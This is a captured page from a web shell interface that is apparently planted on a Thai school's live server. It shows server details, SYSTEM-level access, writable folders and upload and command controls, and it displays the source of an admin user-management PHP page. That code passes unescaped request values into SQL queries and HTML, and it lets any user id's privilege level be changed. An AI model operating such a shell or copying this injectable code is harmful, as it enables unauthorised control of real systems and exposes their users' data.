403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/ratana/2567/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/ratana/2567/modules/admin/user_personla.php
<?
CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);
?>
<SCRIPT LANGUAGE='JAVASCRIPT' TYPE='TEXT/JAVASCRIPT'>
 <!--
var win=null;
function NewWindow(mypage,myname,w,h,pos,infocus){
if(pos=="random"){myleft=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;mytop=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;}
if(pos=="center"){myleft=(screen.width)?(screen.width-w)/2:100;mytop=(screen.height)?(screen.height-h)/2:100;}
else if((pos!='center' && pos!="random") || pos==null){myleft=0;mytop=20}
settings="width=" + w + ",height=" + h + ",top=" + mytop + ",left=" + myleft + ",scrollbars=yes,location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no";win=window.open(mypage,myname,settings);
win.focus();}
// -->
</script>
<div align="center">
	  <table cellspacing="0" cellpadding="0" width="1005" height=420 border="0">
        <tbody>
          <tr>
            <td>
                <table cellspacing="0" cellpadding="0" width="98%" border="0">
                  <tbody>
                    <tr>
                      <td><table width="100%">
                          <tr>
                            <td>
                              <table width="100%" align="center" cellspacing="0" cellpadding="0" border="0">
                                <tr>
                                  <td >
								  <?
class Paginator{
	var $items_per_page;
	var $items_total;
	var $current_page;
	var $num_pages;
	var $mid_range;
	var $low;
	var $high;
	var $limit;
	var $return;
	var $default_ipp;
	var $querystring;
	var $url_next;

	function Paginator()
	{
		$this->current_page = 1;
		$this->mid_range = 7;
		$this->items_per_page = $this->default_ipp;
		$this->url_next = $this->url_next;
	}
	function paginate()
	{

		if(!is_numeric($this->items_per_page) OR $this->items_per_page <= 0) $this->items_per_page = $this->default_ipp;
		$this->num_pages = ceil($this->items_total/$this->items_per_page);

		if($this->current_page < 1 Or !is_numeric($this->current_page)) $this->current_page = 1;
		if($this->current_page > $this->num_pages) $this->current_page = $this->num_pages;
		$prev_page = $this->current_page-1;
		$next_page = $this->current_page+1;


		if($this->num_pages > 10)
		{
			$this->return = ($this->current_page != 1 And $this->items_total >= 10) ? "<a class=\"paginate\" href=\"".$this->url_next.$this->$prev_page."\">&laquo; ย้อนกลับ</a> ":"<span class=\"inactive\" href=\"#\">&laquo; ย้อนกลับ</span> ";

			$this->start_range = $this->current_page - floor($this->mid_range/2);
			$this->end_range = $this->current_page + floor($this->mid_range/2);

			if($this->start_range <= 0)
			{
				$this->end_range += abs($this->start_range)+1;
				$this->start_range = 1;
			}
			if($this->end_range > $this->num_pages)
			{
				$this->start_range -= $this->end_range-$this->num_pages;
				$this->end_range = $this->num_pages;
			}
			$this->range = range($this->start_range,$this->end_range);

			for($i=1;$i<=$this->num_pages;$i++)
			{
				if($this->range[0] > 2 And $i == $this->range[0]) $this->return .= " ... ";
				if($i==1 Or $i==$this->num_pages Or in_array($i,$this->range))
				{
					$this->return .= ($i == $this->current_page And $_GET['Page'] != 'All') ? "<a title=\"Go to page $i of $this->num_pages\" class=\"current\" href=\"#\">$i</a> ":"<a class=\"paginate\" title=\"Go to page $i of $this->num_pages\" href=\"".$this->url_next.$i."\">$i</a> ";
				}
				if($this->range[$this->mid_range-1] < $this->num_pages-1 And $i == $this->range[$this->mid_range-1]) $this->return .= " ... ";
			}
			$this->return .= (($this->current_page != $this->num_pages And $this->items_total >= 10) And ($_GET['Page'] != 'All')) ? "<a class=\"paginate\" href=\"".$this->url_next.$next_page."\">ถัดไป &raquo;</a>\n":"<span class=\"inactive\" href=\"#\">&raquo; ถัดไป</span>\n";
		}
		else
		{
			for($i=1;$i<=$this->num_pages;$i++)
			{
				$this->return .= ($i == $this->current_page) ? "<a class=\"current\" href=\"#\">$i</a> ":"<a class=\"paginate\" href=\"".$this->url_next.$i."\">$i</a> ";
			}
		}
		$this->low = ($this->current_page-1) * $this->items_per_page;
		$this->high = ($_GET['ipp'] == 'All') ? $this->items_total:($this->current_page * $this->items_per_page)-1;
		$this->limit = ($_GET['ipp'] == 'All') ? "":" LIMIT $this->low,$this->items_per_page";
	}

	function display_pages()
	{
		return $this->return;
	}
}
?>
<html>
<head>

</head>
<style type="text/css"> 
<!--
	.paginate {
	font-family: Arial, Helvetica, sans-serif;
	font-size: .7em;
	}
	a.paginate {
	border: 1px solid #000080;
	padding: 2px 6px 2px 6px;
	text-decoration: none;
	color: #000080;
	}
	h2 {
		font-size: 12pt;
		color: #003366;
		}
		
		 h2 {
		line-height: 1.2em;
		letter-spacing:-1px;
		margin: 0;
		padding: 0;
		text-align: left;
		}
	a.paginate:hover {
	background-color: #000080;
	color: #FFF;
	text-decoration: underline;
	}
	a.current {
	border: 1px solid #000080;
	font: bold .7em Arial,Helvetica,sans-serif;
	padding: 2px 6px 2px 6px;
	cursor: default;
	background:#000080;
	color: #FFF;
	text-decoration: none;
	}
	span.inactive {
	border: 1px solid #999;
	font-family: Arial, Helvetica, sans-serif;
	font-size: .7em;
	padding: 2px 6px 2px 6px;
	color: #999;
	cursor: default;
	}
-->
</style>

<body>
<br>
<form name="form3" method="post" action="?name=admin&file=usersearch">
  
  <table width=500  border="0" align="right" cellpadding="0" cellspacing="0">

    <tr class="unnamed1">
		<td width="11" class="unnamed2">
			<img src="images/admin/search.jpg" alt="s" width="19" height="18">
		</td>
		
		<td width="70" class="unnamed2">
			<div align="left">
			<strong>ระบุเงื่อนไข</strong>
			</div>
		</td>
		<td width="100">
			<label>
			</label>
				<input name="search" type="text" id="search" value="<?=$_GET["search"];?>">
		</td>
      <td width="110">
        <div align="left">
          <input type="submit" name="Submit2" value="ค้นหา">
        </div></td>
    </tr>
  </table>

  <br>
  </form>
<?

	$strSQL = "SELECT * FROM ".TB_user." where id like '%$search%' or category_name like '%$search%' ";



$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$Num_Rows = mysql_num_rows($objQuery);

$Per_Page = 20;   // Per Page

$Page = $_GET["Page"];
if(!$_GET["Page"])
{
	$Page=1;
}

$Prev_Page = $Page-1;
$Next_Page = $Page+1;

$Page_Start = (($Per_Page*$Page)-$Per_Page);
if($Num_Rows<=$Per_Page)
{
	$Num_Pages =1;
}
else if(($Num_Rows % $Per_Page)==0)
{
	$Num_Pages =($Num_Rows/$Per_Page) ;
}
else
{
	$Num_Pages =($Num_Rows/$Per_Page)+1;
	$Num_Pages = (int)$Num_Pages;
}

$strSQL .=" ORDER BY id desc LIMIT $Page_Start , $Per_Page";
$objQuery  = mysql_query($strSQL);
?>

<?
mysql_close();
?>
								  </td>
                                </tr>
                                <tr>
                                  <td align="left"><br />
                                      <b><img src="images/icon/plus.gif" border="0" align="absmiddle" /> <a href="?name=admin&amp;file=main">หน้าหลักผู้ดูแลระบบ</a> &nbsp;&nbsp;<img src="images/icon/arrow_wap.gif" border="0" align="absmiddle" />&nbsp;&nbsp; จัดการผู้ใช้ระดับเขต</b> <br />

                                      <br />
                                      <!-- แสดงผลรายการ -->
                                      <?
//////////////////////////////////////////// แสดงรายชื่อ
if($_GET[op] == ""){
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 20 ;
$SUMPAGE = $db->num_rows(TB_user,"id","working='4' and status='1'");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
?>
                                      <form action="?name=admin&amp;file=user_cp&amp;op=user_del&amp;action=multidel" method="post" name="myform" id="myform">
                                        <table width="100%" align="center" cellspacing="2" cellpadding="1" >
                                          <tr bgcolor="#990000" height="25">
                                            <td><div align="center"><font color="#FFFFFF"><b>ชื่อผู้ใช้</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>ชื่อ - นามสกุล</b></font></div></td>
											<td><div align="center"><font color="#FFFFFF"><b>ตำแหน่ง</b></font></div></td>
											<td><div align="center"><font color="#FFFFFF"><b>กลุ่ม</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>สถานะ</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>แก้ไข</b></font></div></td>
                                           
                                          </tr>
                                          <?
$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE level between 8 and 13 and working='4' and status='1' ORDER BY level ASC LIMIT $goto, $limit ");
while($arr[user] = $db->fetch($res[user])){
	$res[groups] = $db->select_query("SELECT * FROM ".TB_ADMIN_GROUP." WHERE id='".$arr[user][level]."' ");
	$arr[groups] = $db->fetch($res[groups]);
?>
                                          <tr>
                                            <td width="70"><img src="usericon/<? echo $arr[user][id];?>.jpg" width="20"  height=25><?echo $arr[user][username];?></td>
                                            <td width="150" ><? echo $arr[user][category_name];?></td>
											<td width="200" ><? echo $arr[user][posit];?></td>
                                            <td align="center" width="170" ><? echo $arr[groups][name];?></td>
<?
					 if($arr[user][level]==13){ 	  
?>
											 <td align="center" width="100" ><font color=red>ปฏิบัติ</font></td>
<?}?>

<?
					 if(($arr[user][level]==8) OR ($arr[user][level]==9)){ 	  
?>
											 <td align="center" width="100" >ไม่แสดง</td>
<?}?>
											 <td align="center" width="60" ><a href="?name=admin&amp;file=user_personla&amp;op=minepass_edit&amp;id=<? echo $arr[user][id];?>"><img src="images/icon/edit.gif" border="0" alt="แก้ไข" /></a></td>
                                          </tr>
                                          <tr>
                                            <td colspan="6" height="1" class="dotline"></td>
                                          </tr>
                                          <?
 } 
?>
                                        </table>
                                      
                                      </form>
                                    <?
	SplitPage($page,$totalpage,"?name=admin&file=user_personla");
	echo $ShowSumPages ;
	echo "<BR>";
	echo $ShowPages ;
	echo "<BR><BR>";



}
else if($_GET[op] == "minepass_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$_GET[id]."' ");
		$arr[user] = $db->fetch($res[user]);
		$db->closedb ();

			if(!$_POST[LEVEL] ){
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\"><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>กรุณากรอกข้อมูลต่างๆให้ครบถ้วน</B></FONT><BR><BR>";
				$ProcessOutput .= "<A HREF=\"javascript:history.go(-1);\"><B>กลับไปแก้ไข</B></A>";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
			}else{
				$User_User = $_GET[id];                     //$_SESSION[admin_user];
				if($_POST[PASSWORD]){
					$NewPass = md5($_POST[PASSWORD]);
					$URLre = "?name=admin&file=user_cp";
					//session_unset();
					//session_destroy();
				}else{
					$NewPass = $_POST[oldpass];
					$URLre = "?name=admin&file=user_cp";
				}
				
		/*require("includes/class.resizepic.php");
		$FILE = $_FILES['FILE'];
		if ((($FILE['type']!="image/jpg") AND ($FILE['type']!="image/jpeg") AND ($FILE['type']!="image/pjpeg")) AND $FILE['size']){
			echo "<script language='javascript'>" ;
			echo "alert('กรุณาใช้ไฟล์นามสกุล jpg เท่านั้น')" ;
			echo "</script>" ;
			echo "<script language='javascript'>javascript:history.back()</script>";
			exit();
		}else{
			@copy ($FILE['tmp_name'] , "usericon/".$arr[user][post_date].".jpg" );
			$original_image = "usericon/".$arr[user][post_date].".jpg" ;
			$desired_width = _Iuser_W ;
			$desired_height = _Iuser_H ;
			$image = new hft_image($original_image);
			$image->resize($desired_width, $desired_height, '0');
			$image->output_resized("usericon/".$arr[user][post_date].".jpg", "JPG");
		}
		*/		
				//ทำการแก้ไขข้อมูลลงดาต้าเบส
				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
				$db->update_db(TB_user,array(
					"level"=>"$_POST[LEVEL]",
					"update_date"=>"".TIMESTAMP.""						

//				)," username='$Admin_User' ");
			)," id='$_GET[id]' ");				
				$db->closedb ();
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><A HREF=\"".$URLre."\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไขข้อมูลเรียบร้อยแล้ว</B></FONT><BR><BR>";
			$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=admin&file=user_personla\">";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
		}
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "minepass_edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		//ดึงค่าของสมาชิกเวปออกมา
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$_GET[id]."' ");		
		$arr[user] = $db->fetch($res[user]);
		$db->closedb ();
?>
                                      <form method="post" action="?name=admin&file=user_personla&op=minepass_edit&action=edit&id=<? echo $arr[user][id];?>" enctype="multipart/form-data">
                                      
                                       <TABLE width="300"  cellSpacing=0 cellPadding=0 border=0>
<b><FONT COLOR=blue size=3>วันนี้ <?=$arr[user][category_name];?></FONT></b><BR>
<FONT COLOR=RED><B>เจ้าหน้าที่วันลา</B></FONT>
 <TR> <TD valign=top>
<INPUT TYPE="radio" NAME="LEVEL" VALUE="13" >เจ้าหน้าที่วันลา<BR>
<BR>
<INPUT TYPE="radio" NAME="LEVEL" VALUE="9" >เลิกปฏิบัติหน้าที่<BR>
<input type="submit" value=" บันทึก " />
</TD></TR>

</TABLE>
                                    </form>
                                    <?
	}else{
		//กรณีไม่ผ่าน
		echo $PermissionFalse ;
	}
}
?>
                                      <br />
                                    <br />
                                  </td>
                                </tr>
                              </table>
                            <br /></td>
                          </tr>
                      </table></td>
                    </tr>
                  </tbody>
                </table>
            </div></td>
          </tr>
        </tbody>
      </table>
	 
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit